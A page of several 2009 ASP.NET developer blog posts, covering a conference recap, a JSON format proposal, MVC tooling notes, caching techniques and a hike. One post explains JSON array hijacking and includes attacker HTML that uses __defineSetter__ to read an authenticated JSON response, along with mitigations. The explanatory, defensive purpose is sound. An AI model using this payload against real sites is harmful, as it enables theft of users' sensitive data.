comments edit

When you visit Norway, it takes a week to recover. Ok, at least when I visit Norway, it takes a week. But that’s just a testament to the good time I had. As they say, what happens in Vegas stays in Vegas, but what happens in Oslo gets recorded as a .NET Rocks Live episode.

The week before last, I spent the week in Oslo, Norway attending and speaking at the Norwegian Developer’s Conference (NDC 09). This conference was not your typical Microsoft conference I usually attend but was a conference on .NET with a heavy Agile Software bent.

IMG_3460

Just looking at the speaker line-up will tell you that. Scott Bellware tweeted a blurb recently that succinctly summarized my impression of the conference:

how to know you’re at a good conference: the speakers are going to sessions (at least the ones who aren’t working on their sessions)

That is definitely true. I didn’t attend as many talks as I would have liked, but I did manage to attend two by Mary Poppendieck which really sparked my imagination and got me excited about the concept of a problem solving organization and learning more about Lean. She had promised to put her slides on her site, but I can’t for the life of me find them! ;)

While there, I gave three talks, one of them being a joint talk with the Hanselnator (aka Mr. Hanselman).

Black Belt Ninja Tips ASP.NET MVC \ This covered several tips on getting more out of ASP.NET MVC and included the first public demonstration of David Ebbo’s T4 template.

**ASP.NET MVC + AJAX = meant for each other \ **This covered the Ajax helpers included with ASP.NET MVC and drilled into some of the lesser known client aspects of these helpers, such as showing the Sys.Mvc.AjaxContext object and how to leverage it. The talk then moved into a demonstration of the client templating feature of ASP.NET Ajax 4 Preview 4. I showed off some of the work Jonathan Carter and I (mostly Jonathan) did to make two-way data binding work with ASP.NET MVC. The audience really dug it.

**The Haacked and Hanselman Show \ **So named because we didn’t have any agenda until about a week before the conference, this ended up being a web security talk where Scott would present a common “secure” implementation of a feature, I would then proceed to “Haack” the feature, and then Scott would fix the feature, all the while explaining what was going on. I think this was very big hit as we saw messages on Twitter like “I’m now too afraid to build a web application”. ;) Of course, I hope more attendees felt empowered rather than fearful. :P

IMG_3484The conference was held in an indoor soccer stadium since it was a venue large enough for all the attendees. They curtained off sections of the bleachers to create rooms for giving the talks. On the outside of the curtains was a large screen which allowed attendees to walk around from talk to talk with a headset on the conference floor if they didn’t feel like sitting in the bleachers.

IMG_3455Plenty of bean bags on the floor provided a comfortable place to relax and listen in. In fact, that’s where I would often find some of my new friends lounging around such as the crazy Irishman.

On the second night of the conference, we all rocked out at the big attendee party featuring the band, DataRock which played some rocking music with geek friendly lyrics like:

I ran into her on computer camp \ (Was that in 84?) \ Not sure \ I had my commodore 64 \ Had to score

– DataRock, Computer Camp Love

data-rockMany thanks to Kjetil Klaussen for posting those lyrics in his NDC 09 highlights post because I had forgotten pretty much every lyric. :) After DataRock, we all went upstairs for the after party to enjoy a more intimate setting with LoveShack, an 80s cover band.

One interesting highlight of the show was a live recording of .NET Rocks. The show was originally going to simply feature Scott Hanselman, but while hanging out in the speakers lounge Carl Franklin, one of the hosts of the show, suggested I join in the fun too.

haack-hanselman-dotnetrocksWhile it was great fun, Scott is a big, no ginormous, personality and I rarely got a word in edgewise, except for the few times I swooped right in just in time to put my foot in my mouth to apparently great comedic effect. In any case, you can listen to the results yourself, though I hope they post the video soon to get the full effect of how much fun everyone was having. :) Be warned, there’s not a lot of real software development content in the show.

The conference ended on Friday leaving all of Saturday for me to relax and actually get out and see Oslo. On Saturday, I headed out to Vigeland Statue Park with an eclectic group of people, Ted Neward, Rocky Lhotka and his wife, Jeremy Miller, and Anna K{Something With Too Many Syllables in a Row}, a conference organizer herself.

The park was very beautiful and I took a ton of pictures, but unfortunately I lost my camera on the flight home from Norway. :( So instead, I’ll just include this Creative Commons licensed picture taken by Cebete from Flickr. The main difference was the sky was a deep blue when we visited.

Vigeland-ParkThat evening, Sondre Bjellås, an attendee, was kind enough to invite several of us over to his flat for a little gathering. I headed over with Bellware and Anna since everyone else was pretty much flattened by the previous weeks activities. It was great to meet non-techie Norwegians such as his wife and friends in order to get a different perspective on what it’s like to live in Norway. The answer: expensive!

In an odd coincidence, on my connecting flight in Philadelphia, I ran into my good friend Walter who happened to be flying home from Belgium. In fact, we were on the same flight in the same exit row with seats right next to each other. How’s that for a funny coincidence?

Show me the Code!

Rune, one of the organizers of the conference, assures me that the videos of the talks will be posted online soon, so you’ll get to see them if you’d like. I’ve also posted my powerpoint slides and code samples here.

Please note that my talks tend to be heavy in demos so the Powerpoint decks don’t have much content in them. Likewise, the code samples represent the “before” state of my talks, not the “after” state. I usually write up a checklist for each talk which I use a to remind myself where I am in those cases where I have a total brain fart and forget my own name under the pressure of presenting.

Other NDC 09 Posts

comments edit

In my last post, I wrote about the hijacking of JSON arrays. Near the end of the post, I mentioned a comment whereby someone suggests that what really should happen is that browsers should be more strict about honoring content types and not execute code with the content type of application/json.

I totally agree! But then again, browsers haven’t had a good track record with being strict with such standards and it’s probably too much to expect browsers to suddenly start tightening ship, not to mention potentially breaking the web in the process.

Another potential solution that came to mind was this: Can we simply change JSON? Is it too late to do that or has that boat left the harbor?

boat-left-harbor

Let me run an idea by you. What if everyone got together and decided to version the JSON standard and change it in such a way that when the entire JSON response is an array, the format is no longer executable script. Note that I’m not referring to an array which is a property of a JSON object. I’m referring to the case when the entire JSON response is an array.

One way to do this, and I’m just throwing this out there, is to make it such that the JSON package must always begin and end with a curly brace. JSON objects already fulfill this requirement, so their format would remain unchanged.

But when the response is a JSON array, we would go from here:

[{"Id":1,"Amt":3.14},{"Id":2,"Amt":2.72}]

to here:

{[{"Id":1,"Amt":3.14},{"Id":2,"Amt":2.72}]}

Client code would simply check to see if the JSON response starts with {[ to determine whether it’s an array, or an object. There many alternatives, such as simply wrapping ALL JSON responses in some new characters to keep it simple.

It’d be possible to do this without breaking every site out there by simply giving all the client libraries a head start. We would update the JavaScript libraries which parse JSON to recognize this new syntax, but still support the old syntax. That way, they’d work with servers which haven’t yet upgraded to the new syntax.

As far as I know, most sites that make use of JSON are using it for Ajax scenarios so the site developer is in control of the client and server anyways. For sites that provide JSON as a cross-site service, upgrading the server before the clients are ready could be problematic, but not the end of the world.

So what do you think? Is this worth pursuing? Not that I have any idea on how I would convince or even who I would need to convince. ;)

UPDATE: 6/26 10:39 AM Scott Koon points out this idea is not new (I didn’t think it would be) and points to a great post that gives more detail on the specifics of executable JSON as it relates to the ECMAScript Specification.

comments edit

A while back I wrote about a subtle JSON vulnerability which could result in the disclosure of sensitive information. That particular exploit involved overriding the JavaScript Array constructor to disclose the payload of a JSON array, something which most browsers do not support now.

However, there’s another related exploit that seems to affect many more browsers. It was brought to my attention recently by someone at Microsoft and Scott Hanselman and I demonstrated it at the Norwegian Developers Conference last week, though it has been demonstrated against Twitter in the past.

hijack

Before I go further, let me give you the punch line first in terms of what this vulnerability affects.

This vulnerability requires that you are exposing a JSON service which…

  • …returns sensitive data.
  • …returns a JSON array.
  • …responds to GET requests.
  • …the browser making the request has JavaScript enabled (very likely the case)
  • …the browser making the request supports the __defineSetter__ method.

Thus if you never send sensitive data in JSON format, or you only send JSON in response to a POST request, etc. then your site is probably not vulnerable to this particular vulnerability (though there could be others).

I’m terrible with Visio, but I thought I’d give it my best shot and try to diagram the attack the best I could. In this first screenshot, we see the unwitting victim logging into the vulnerable site, and the vulnerable site issues an authentication cookie, which the browser holds onto.

Json-Hijack-1

At some point, either in the past, or the near future, the bad guy spams the victim with an email promising a hilariously funny video of a hamster on a piano.

Json-Hijack-2

But the link actually points to the bad guy’s website. When the victim clicks on the link, the next two steps happen in quick succession. First, the victim’s browser makes a request for the bad guy’s website.

Json-Hijack-3

The website responds with some HTML containing some JavaScript along with a script tag. When the browser sees the script tag, it makes another GET request back to the vulnerable site to load the script, sending the auth cookie along.

Json-Hijack-4

The bad guy has tricked the victim’s browser to issue a request for the JSON containing sensitive information using the browser’s credentials (aka the auth cookie). This loads the JSON array as executable JavaScript and now the bad guy has access to this data.

To gain a deeper understanding, it may help to see actual code (which you can download and run) which demonstrates this attack.

Note that the following demonstration is not specific to ASP.NET or ASP.NET MVC in any way, I just happen to be using ASP.NET MVC to demonstrate it. Suppose the Vulnerable Website returns JSON with sensitive data via an action method like this.

[Authorize]
public JsonResult AdminBalances() {
  var balances = new[] {
    new {Id = 1, Balance=3.14}, 
    new {Id = 2, Balance=2.72},
    new {Id = 3, Balance=1.62}
  };
  return Json(balances);
}

Assuming this is a method of HomeController, you can access this action via a GET request for /Home/AdminBalances which returns the following JSON:

[{"Id":1,"Balance":3.14},{"Id":2,"Balance":2.72},{"Id":3,"Balance":1.62}]

Notice that I’m requiring authentication via the AuthorizeAttribute on this action method, so an anonymous GET request will not be able to view this sensitive data.

The fact that this is a JSON array is important. It turns out that a script that contains a JSON array is a valid JavaScript script and can thus be executed. A script that just contains a JSON object is not a valid JavaScript file. For example, if you had a JavaScript file that contained the following JSON:

{“Id”:1, “Balance”:3.14}

And you had a script tag that referenced that file:

<script src="http://example.com/SomeJson"></script>

You would get a JavaScript error in your HTML page. However, through an unfortunate coincidence, if you have a script tag that references a file only containing a JSON array, that would be considered valid JavaScript and the array gets executed.

Now let’s look at the HTML page that the bad guy hosts on his/her own server:

<html> 
...
<body> 
    <script type="text/javascript"> 
        Object.prototype.__defineSetter__('Id', function(obj){alert(obj);});
    </script> 
    <script src="http://example.com/Home/AdminBalances"></script> 
</body> 
</html>

What’s happening here? Well the bad guy is changing the prototype for Object using the special __defineSetter__ method which allows overriding what happens when a property setter is being called.

In this case, any time a property named Id is being set on any object, an anonymous function is called which displays the value of the property using the alert function. Note that the script could just as easily post the data back to the bad guy, thus disclosing sensitive data.

As mentioned before, the bad guy needs to get you to visit his malicious page shortly after logging into the vulnerable site while your session on that site is still valid. Typically a phishing attack via email containing a link to the evil site does the trick.

If by blind bad luck you’re still logged into the original site when you click through to the link, the browser will send your authentication cookie to the website when it loads the script referenced in the script tag. As far as the original site is concerned, you’re making a valid authenticated request for the JSON data and it responds with the data, which now gets executed in your browser. This may sound familiar as it is really a variant of a Cross Site Request Forgery (CSRF) attack which I wrote about before.

If you want to see it for yourself, you can grab the CodeHaacks solution from GitHub and run the JsonHijackDemo project locally (right click on the project and select Set as StartUp Project. Just follow the instructions on the home page of the project to see the attack in action. It will tell you to visit http://demo.haacked.com/security/JsonAttack.html.

Note that this attack does not work on IE 8 which will tell you that __defineSetter__ is not a valid method. Last I checked, it does work on Chrome and Firefox.

The mitigation is simple. Either never send JSON arrays OR always require an HTTP POST to get that data (except in the case of non-sensitive data in which case you probably don’t care). For example, with ASP.NET MVC, you could use the AcceptVerbsAttribute to enforce this like so:

[Authorize]
[AcceptVerbs(HttpVerbs.Post)]
public JsonResult AdminBalances() {
  var balances = new[] {
    new {Id = 1, Balance=3.14}, 
    new {Id = 2, Balance=2.72},
    new {Id = 3, Balance=1.62}
  };
  return Json(balances);
}

One issue with this approach is that many JavaScript libraries such as jQuery request JSON using a GET request by default, not POST. For example, $.getJSON issues a GET request by default. So when calling into this JSON service, you need to make sure you issue a POST request with your client library.

ASP.NET and WCF JSON service endpoints actually wrap their JSON in an object with the “d” property as I wrote about a while back. While it might seem odd to have to go through this property to get access to your data, this awkwardness is eased by the fact that the generated client proxies for these services strip the “d” property so the end-user doesn’t need to know it was ever there.

With ASP.NET MVC (and other similar frameworks), a significant number of developers are not using client generated proxies (we don’t have them) but instead using jQuery and other such libraries to call into these methods, making the “d” fix kind of awkward.

What About Checking The Header?

Some of you might be wondering, “why not have the JSON service check for a special header such as the X-Requested-With: XMLHttpRequest or Content-Type: application/json before serving it up in response to a GET request?” I too thought this might be a great mitigation because most client libraries send one or the other of these headers, but a browser’s GET request in response to a script tag would not.

The problem with this (as a couple of co-workers pointed out to me) is that at some point in the past, the user may have made a legitimate GET request for that JSON in which case it may well be cached in the user’s browser or in some proxy server in between the victim’s browser and the vulnerable website. In that case, when the browser makes the GET request for the script, the request might get fulfilled from the browser cache or proxy cache. You could try setting No-Cache headers, but at that point you’re trusting that the browser and all proxy servers correctly implement caching and that the user can’t override that accidentally.

Of course, this particular caching issue isn’t a problem if you’re serving up your JSON using SSL.

The real issue?

There’s a post at the Mozilla Developer Center which states that object and array initializers should not invoke setters when evaluated, which at this point, I tend to agree with, though a comment to that post argues that perhaps browsers really shouldn’t execute scripts regardless of their content type, which is also a valid complaint.

But at the end of the day, assigning blame doesn’t make your site more secure. These type of browser quirks will continue to crop up from time to time and we as web developers need to deal with them. Chrome 2.0.172.31 and Firefox 3.0.11 were both vulnerable to this. IE 8 was not because it doesn’t support this method. I didn’t try it in IE 7 or IE 6.

It seems to me that to be secure by default, the default behavior for accessing JSON should probably be POST and you should opt-in to GET, rather than the other way around as is done with the current client libraries. What do you think? And how do other platforms you’ve worked with handle this? I’d love to hear your thoughts.

In case you missed it, here are the repro steps again: grab the CodeHaacks solution from GitHub and run the JsonHijackDemo project locally (right click on the project and select Set as StartUp Project. Just follow the instructions on the home page of the project to see the attack in action. To see a successful attack, you’ll need to do this in a vulnerable browser such as Firefox 3.0.11.

I followed up this post with a proposal to fix JSON to prevent this particular issue.

Tags: aspnetmvc, json, javascript, security, browsers

code comments edit

Every now and then some email or website comes along promising to prove Fred Brooks wrong about this crazy idea he wrote in The Mythical Man Month (highly recommended reading!) that there is no silver bullet which by itself will provide a tenfold improvement in productivity, reliability, and simplicity within a decade.

This time around, the promise was much like others, but they felt the need to note that their revolutionary new application/framework/doohickey will allow business analysts to directly build applications 10 times as fast without the need for programmers![revenge-nerds](http://haacked.com/images/haacked_com/WindowsLiveWriter/AndGetRidOfThosePeskyProgrammers_A0BE/revenge-nerds_thumb.jpg "revenge-nerds")

Ah yeah! Get rid of those foul smelling pesky programmers! We don’t need em!

Now wait one dag-burn minute! Seriously?!

I’m going to try real hard for a moment to forget they said that and not indulge my natural knee jerk reaction which is to flip the bozo bit immediately. If I were a more reflective person, this would raised a disturbing question:

Why are these business types so eager to get rid of us programmers?

It’s easy to blame the suits for not understanding software development and forcing us into a Tom Smykowski moment having to defend what it is we do around here.

Well-well look. I already told you: I deal with the god damn customers so the engineers don’t have to. I have people skills; I am good at dealing with people. Can’t you understand that? What the hell is wrong with you people?

Maybe, as Steven “Doc” List quotes from Cool Hand Luke in his latest End Bracket article on effective communication for MSDN Magazine,

What we’ve got here is a failure to communicate.

Leon Bambrick (aka SecretGeek) recently wrote about this phenomena in his post entitled, The Better You Program, The Worse You Communicate, in which he outlines how techniques that make us effective software developers do not apply to communicating with other humans.

After all, we can sometimes be hard to work with. We’re often so focused on the technical aspects and limitations of a solution that we unknowingly confuse the stakeholders with jargon and annoy them by calling their requirements “ludicrous”. Sometimes, we fail to deeply understand their business and resort to making fun of our stakeholders rather than truly understanding their needs. No wonder they want to do the programming themselves!

Ok, ok. It’s not always like this. Not every programmer is like this and it isn’t fair to lay all the blame at our feet. I’m merely trying to empathize and understand the viewpoint that would lead to this idea that moving programmers out of the picture would be a good thing.

Some blame does deserve to lie squarely at the feet of these snake oil salespeople, because at the moment, they’re selling a lie. What they’d like customers to believe is your average business analyst simply describes the business in their own words to the software, and it spits out an application.

The other day, I started an internal email thread describing in hand-wavy terms some feature I thought might be interesting. A couple hours later, my co-worker had an implementation ready to show off.

Now that my friends, is the best type of declarative programming. I merely declared my intentions, waited a bit, and voila!  Code! Perhaps that’s along the lines of what these types of applications hope to accomplish, but there’s one problem. In the scenario I described, it required feeding requirements to a human. If I had sent that email to some software, it would have no idea what to do with it.

At some point, something close to this might be possible, but only when software has reached the point where it can exhibit sophisticated artificial intelligence and really deal with fuzziness. In other words, when the software itself becomes the programmer, only then might you really get rid of the human programmer. But I’m sorry to say, you’re still working with a programmer, just one who doesn’t scoff at your requirements arrogantly (at least not in your face while it plots to take over the world, carrot-top).

Until that day, when a business analyst wires together an applications with Lego-like precision using such frameworks, that analyst has in essence become a programmer. That work requires many of the same skills that developers require. At this point, you really haven’t gotten rid of programmers, you’ve just converted a business type into a programmer, but one who happens to know the business very well.

In the end, no matter how “declarative” a system you build and how foolproof it is such that a non-programmer can build applications by dragging some doohickeys around a screen, there’s very little room for imprecision and fuzziness, something humans handle well, but computers do not, as Spock demonstrated so well in an episode of Star Trek.

“Computer, compute the last digit of PI” - Spock

Throw into the mix that the bulk of the real work of building an application is not the coding, but all the work surrounding that, as Udi Dahan points out in his post on The Fallacy of ReUse.

This is not to say that I don’t think we should continue to invest in building better and better tools. After all, the history of software development is about building better and better higher level tools to make developers more productive. I think the danger lies in trying to remove the discipline and traits that will always be required when using these tools to build applications.

Even when you can tell the computer what you want in human terms, and it figures it out, it’s important to still follow good software development principles, ensure quality checks, tests, etc…

The lesson for us programmers, I believe is two-fold. One, we have to educate our stakeholders about how software production really works. Even if they won’t listen, a little knowledge and understanding here goes a long way. Be patient, don’t be condescending, and hope for the best. Secondly, we have to educate ourselves about the business in a deep manner so that we are seen as valuable business partners who happen to write the code that matters.

comments edit

A little while ago I announced our plans for ASP.NET MVC as it relates to Visual Studio 2010. ASP.NET MVC wasn’t included as part of Beta 1, which raised a few concerns by some (if not conspiracy theories!) ;). The reason for this was simple as I pointed out:

One thing you’ll notice is that ASP.NET MVC is not included in Beta 1. The reason for this is that Beta 1 started locking down before MVC 1.0 shipped. ASP.NET MVC will be included as part of the package in VS10 Beta 2.

We’re working hard to have an out-of-band installer which will install the project templates and tooling for ASP.NET MVC which works with VS2010 Beta 1 sometime in June on CodePlex. Sorry for the inconvenience. I’ll blog about it once it is ready.

Today I’m happy to announce that we’re done with the work I described and the installer is now available on CodePlex. Be sure to give it a try as many of the new VS10 features intended to support the TDD workflow fit very nicely with ASP.NET MVC, which ScottGu will describe in an upcoming blog post.

If you run into problems with the intaller, try out this troubleshooting guide by Jacques, the developer who did the installer work and do provide feedback.

You’ll notice that the installer says this is ASP.NET MVC 1.1, but as the readme notes point out, this is really ASP.NET MVC 1.0 retargeted for Visual Studio 2010. The 1.1 is just a placeholder version number. We bumped up the version number to avoid runtime conflicts with ASP.NET MVC 1.0. All of this and more is described in the Release Notes.

When VS10 Beta 2 comes out, you won’t need to download a separate standalone installer to get ASP.NET MVC (though a standalone installer will be made available for VS2008 users that will run on ASP.NET 3.5 SP1). A pre-release version of ASP.NET MVC 2 will be included as part of the Beta 2 installer as described in the …

Roadmap

Road Blur: Photo credit: arinas74 on
stock.xchng

I recently published the Roadmap for ASP.NET MVC 2 which gives a high level look at what features we plan to do for ASP.NET MVC 2. The features are noticeably lacking in details as we’re deep in the planning phase trying to gather pain points.

Right now, we’re avoiding focusing the implementation details as much as possible. When designing software, it’s very easy to have preconceived notions about what the solution should be, even when we really don’t have a full grasp of the problem that needs to be solved.

Rather than guiding people towards what we think the solution is, I hope to focus on making sure we understand the problem domain and what people want to accomplish with the framework. That leaves us free to try out alternative approaches that we might not have considered before such as alternatives to expression based URL helpers. Maybe the alternative will work out, maybe not. Ideally, I’d like to have several design alternatives to choose from for each feature.

As we get further along the process, I’ll be sure to flesh out more and more details in the Roadmap and share them with you.

Snippets

One cool new feature of VS10 is that snippets now work in the HTML editor. Jeff King from the Visual Web Developer team sent me the snippets we plan to include in the next version. They are also downloadable from the CodePlex release page. Installation is very simple:

Installation Steps:

​1) Unzip “ASP.NET MVC Snippets.zip” into “C:\Users\<username>\Documents\Visual Studio 10\Code Snippets\Visual Web Developer\My HTML Snippets”, where “C:\” is your OS drive. \ 2) Visual Studio will automatically detect these new files.

Try them out and let us know if you have ideas for snippets that will help you be more productive.

Important Links:

comments edit

One of the features contained in the MVC Futures project is the ability to generate action links in a strongly typed fashion using expressions. For example:

<%= Html.ActionLink<HomeController>(c => c.Index()) %>

Will generate a link to to the Index action of the HomeController.

It’s a pretty slick approach, but it is not without its drawbacks. First, the syntax is not one you’d want to take as your prom date. I guess you can get used to it, but a lot of people who see it for the first time kind of recoil at it.

The other problem with this approach is performance as seen in this slide deck I learned about from Brad Wilson. One of the pain points the authors of the deck found was that the compilation of the expressions was very slow.

I had thought that we might be able to mitigate these performance issues via some sort of caching of the compiled expressions, but that might not work very well. Consider the following case:

<% for(int i = 0; i < 20; i++) { %>

  <%= Html.ActionLink<HomeController>(c => c.Foo(i)) %>

<% } %>

Each time through that loop, the expression is the same: c => c.Foo(i)

But the value of the captured “i” is different each time. If we try to cache the compiled expression, what happens?

So I started thinking about an alternative approach using code generation against the controllers and circulated an email internally. One approach was to code gen action specific action link methods. Thus the about link for the home controller (assuming we add an id parameter for demonstration purposes) would be:

<%= HomeAboutLink(123) %>

Brad had mentioned many times that while he likes expressions, he’s no fan of using them for links and he tends to write specific action link methods just like the above. So what if we could generate them for you so you didn’t have to write them by hand?

A couple hours after starting the email thread, David Ebbo had an implementation of this ready to show off. He probably had it done earlier for all I know, I was stuck in meetings. Talk about the best kind of declarative programming. I declared what I wanted roughly with hand waving, and a little while later, the code just appears! ;)

David’s approach uses a BuildProvider to reflect over the Controllers and Actions in the solution and generate custom action link methods for each one. There’s plenty of room for improvement, such as ensuring that it honors the ActionNameAttribute and generating overloads, but it’s a neat proof of concept.

One disadvantage of this approach compared to the expression based helpers is that there’s no refactoring support. However, if you rename an action method, you will get a compilation error rather than a runtime error, which is better than what you get without either. One advantage of this approach is that it performs fast and doesn’t rely on the funky expression syntax.

These are some interesting tradeoffs we’ll be looking closely at for the next version of ASP.NET MVC.

comments edit

ASP.NET Pages are designed to stream their output directly to a response stream. This can be a huge performance benefit for large pages as it doesn’t require buffering and allocating very large strings before rendering. Allocating large strings can put them on the Large Object Heap which means they’ll be sticking around for a while.

string However, there are many cases in which you really want to render a page to a string so you can perform some post processing. I wrote about one means using a Response filter eons ago.

However, recently, I learned about a method of the Page class I never noticed which allows me to use a much lighter weight approach to this problem.

The method in question is CreateHtmlTextWriter which is protected, but also virtual.

So here’s an example of the code-behind for a page that can leverage this method to filter the output before its sent to the browser.

public partial class FilterDemo : System.Web.UI.Page
{
  HtmlTextWriter _oldWriter = null;
  StringWriter _stringWriter = new StringWriter();

  protected override HtmlTextWriter CreateHtmlTextWriter(TextWriter tw)
  {
    _oldWriter = base.CreateHtmlTextWriter(tw);
    return base.CreateHtmlTextWriter(_stringWriter);
  }

  protected override void Render(HtmlTextWriter writer)
  {
    base.Render(writer);
    string html = _stringWriter.ToString();
    html = html.Replace("REPLACE ME!", "IT WAS REPLACED!");
    _oldWriter.Write(html);
  }
}

In the CreateHtmlTextWriter method, we simply use the original logic to create the HtmlTextWriter and store it away in an instance variable.

Then we use the same logic to create a new HtmlTextWriter, but this one has our own StringWriter as the underlying TextWriter. The HtmlTextWriter passed into the Render method is the one we created. We call Render on that and grab the output from the StringWriter and now can do all the replacements we want. We finally write the final output to the original HtmlTextWriter which is hooked up to the response.

A lot of caveats apply in using this technique. First, as I mentioned before, for large pages, you could be killing scalability and performance by doing this. Also, I haven’t tested this with output caching, async pages, etc… etc…, so your mileage may vary.

Note, if you want to call one page from another, and get the output as a string within the first page, you can pass your own TextWriter to Server.Execute, so this technique is not necessary in that case.

personal comments edit

Being that it’s a glorious Memorial Day Weekend up here in the Northwest, my co-worker Eilon (developer lead for ASP.NET MVC) and I decided to go on a hike to Mt Si where we had a bit of a scary moment.

in-front-of-mt-si I first learned about Mt Si at the company picnic last year, seen behind me and Cody in this photo. I remember seeing the imposing cliff face and thinking to myself, I want to climb up there. I imagined the view would be quite impressive.

Mt Si is a moderately strenuous hike 8 miles round trip with an elevation gain of 3100 feet taking you to about 3600 feet, according to the Washington Trails Association website. Given that it is a very popular hike and that this was a three-day weekend, we figured we’d get an early start by heading over there at 7 AM.

That ended up being a good idea as the parking lot had quite a few cars already, but it wasn’t full by any means. This is a picture of the trail head which starts the hike off under a nice canopy of green.

041Right away, the no-nonsense trail starts you off huffing uphill amongst a multitude of trees.

044

Along the way, there are the occasional diversions. For example, this one won me $10 as the result of a bet that I wouldn’t walk to the edge of the tree overhanging the drop off.

050

When you get to the top, there’s a great lookout with amazing views. But what caught our attention is a rock outcropping called the “Haystack”, which takes you up another 500 feet. Near the base of the Haystack is a small memorial for those who’ve died from plummeting off its rocky face. It’s not a trivial undertaking, but I demanded we try.

Mount Si
026Unfortunately, there’s nothing in the above picture to provide a better sense of scale for this scramble. In the following picture you can see some people pretty much scooting down the steep slope on their butts.

Mount Si
029

Once they were down, we set up and reached around two thirds of the way when I made the mistake of looking back and made a remark about how it’s going to be much more difficult going down. That started getting us nervous because it’s always easier going up than down.

It would have probably been best if I hadn’t made that remark because the climb wasn’t really that difficult, but introducing a bit of nervousness into the mix can really sabotage one’s confidence, which you definitely want on a climb.

At that point, the damage was done and we decided we had enough and started heading back down. Better to try again another day when we felt more confident. At that moment, a couple heading down told us we were almost there and it wasn’t so bad. Our success heading back down and their comments started to bolster our confidence to the point where I was ready to head back up, until I noticed that my shoe felt odd.

What I hadn’t noticed while climbing on the steep face was that my sole had almost completely detached from my hiking boot during the climb. Fortunately, Eilon had some duct tape on hand allowing me to make this ghetto looking patch job.

MacGuyver Repair
JobAt this point I had a mild panic because I worried that the duct tape would cause me to lose grip with my boots on the way down. And frankly, I was pissed off as well, as I’ve had these boots for a few years, but haven’t hiked in them all that often. What a perfect time for them completely fall apart!

Fortunately, I didn’t have much problem climbing back down and we stopped at the first summit to take some pictures and have a brief snack.

Not having the guts today to climb the big rock, I scrambled up a much smaller one and got this great view of Mt Rainier in its full splendor.

071

The view from the top is quite scenic and using binoculars, I was able to check on my family back in Bellevue (joke).

079Going back down was much quicker than the way up and we had a blast of it practically trail running the first part, until my other shoe gave out.

084Guess the warranty must have run out yesterday. ;) Fortunately, Eilon, who was prepared with the Duct tape, also had all terrain sandals with him, which I wore the rest of the way. Next time, I think I’ll ditch the Salomon boots and try Merrells which other hikers I ran into were wearing.

Despite the mishaps, the hike was really a fun romp in the woods and I highly recommend it to anyone in the Seattle area to give it a try. Go early to avoid the crowds. I doubled my $10 in an over/under bet where I took 140 and over cars in the lot. We stopped counting at around 170 cars in the lot when we left.

Mount Si
052This is one last look at Mt Si on our way back home. Eilon put together a play-by-play using Live Maps Bird’s Eye view (click for larger).

The path we
tookFor more info on the Mt Si hike, check out the Washington Trails Association website.

asp.net, code, asp.net mvc comments edit

This post is now outdated

I apologize for not blogging this over the weekend as I had planned, but the weather this weekend was just fantastic so I spent a lot of time outside with my son.

the-parkIf you haven’t heard yet, Visual Studio 2010 Beta 1 is now available for MSDN subscribers to download. It will be more generally available on Wednesday, according to Soma.

You can find a great whitepaper which describes what is new for web developers in ASP 4 which is included.

One thing you’ll notice is that ASP.NET MVC is not included in Beta

  1. The reason for this is that Beta 1 started locking down before MVC 1.0 shipped. ASP.NET MVC will be included as part of the package in VS10 Beta 2.

Right now, if you try and open an MVC project with VS 2010 Beta 1, you’ll get some error message about the project type not being supported. The easy fix for now is to remove the ASP.NET MVC ProjectTypeGuid entry as described by this post.

We’re working hard to have an out-of-band installer which will install the project templates and tooling for ASP.NET MVC which works with VS2010 Beta 1 sometime in June on CodePlex. Sorry for the inconvenience. I’ll blog about it once it is ready.

asp.net, code, asp.net mvc comments edit

A while back, I wrote about Donut Caching in ASP.NET MVC for the scenario where you want to cache an entire view except for a small bit of it. The more technical term for this technique is probably “cache substitution” as it makes use of the Response.WriteSubstitution method, but I think “Donut Caching” really describes it well — you want to cache everything but the hole in the middle.

However, what happens when you want to do the inverse. Suppose you want to cache the donut hole, instead of the donut?

House of Sims
Photostream

I think we should nickname all of our software concepts after tasty food items, don’t you agree?

In other words, suppose you want to cache a portion of the view in a different manner (for example, with a different duration) than the entire view? It hasn’t been exactly clear how do to do this with ASP.NET MVC.

For example, the Html.RenderPartial method ignores any OutputCache directives on the view user control. If you happen to use Html.RenderAction from MVC Futures which attempts to render the output from an action inline within another view, you might run into this bug in which the entire view is cached if the target action has an OutputCacheAttribute applied.

I did a little digging into this today and it turns out that when you specify the OutputCache directive on a control (or page for that matter), the output caching is not handled by the control itself. Rather, it appears that compilation system for ASP.NET pages kicks in and interprets that directive and does the necessary gymnastics to make it work.

In plain English, this means that what I’m about to show you will only work for the default WebFormViewEngine, though I have some ideas on how to get it to work for all view engines. I just need to chat with the members of the ASP.NET team who really understand the deep grisly guts of ASP.NET to figure it out exactly.

With the default WebFormViewEngine, it’s actually pretty easy to get partial output cache working. Simply add a ViewUserControl declaratively to a view and put your call to RenderAction or RenderPartial inside of that ViewUserControl. If you’re using RenderAction, you’ll need to remove the OutputCache attribute from the action you’re pointing to.

Keep in mind that ViewUserControls inherit the ViewData of the view they’re in. So if you’re using a strongly typed view, just make the generic type argument for ViewUserControl have the same type as the page.

If that last paragraph didn’t make sense to you, perhaps an example is in order. Suppose you have the following controller action.

public ActionResult Index() {
  var jokes = new[] { 
    new Joke {Title = "Two cannibals are eating a clown"},
    new Joke {Title = "One turns to the other and asks"},
    new Joke {Title = "Does this taste funny to you?"}
  };

  return View(jokes);
}

And suppose you want to produce a list of jokes in the view. Normally, you’d create a strongly typed view and within that view, you’d iterate over the model and print out the joke titles.

We’ll still create that strongly typed view, but that view will contain a view user control in place of where we would have had the code to iterate the model (note that I omitted the namespaces within the Inherits attribute value for brevity).

<%@ Page Language="C#" Inherits="ViewPage<IEnumerable<Joke>>" %>
<%@ Register Src="~/Views/Home/Partial.ascx" TagPrefix="mvc" TagName="Partial" 
%>
<mvc:Partial runat="server" />

Within that control, we do what we would have done in the main view and we specify the output cache values. Note that the ViewUserControl is generically typed with the same type argument that the view is, IEnumerable<Joke>. This allows us to move the exact code we would have had in the view to this control. We also specify the OutputCache directive here.

<%@ Control Language="C#" Inherits="ViewUserControl<IEnumerable<Joke>>" %>
<%@ OutputCache Duration="10000" VaryByParam="none" %>

<ul>
<% foreach(var joke in Model) { %>
    <li><%= Html.Encode(joke.Title) %></li>
<% } %>
</ul>

Now, this portion of the view will be cached, while the rest of your view will continue to not be cached. Within this view user control, you could have calls to RenderPartial and RenderAction to your heart’s content.

Note that if you are trying to cache the result of RenderPartial this technique doesn’t buy you much unless the cost to render that partial is expensive.

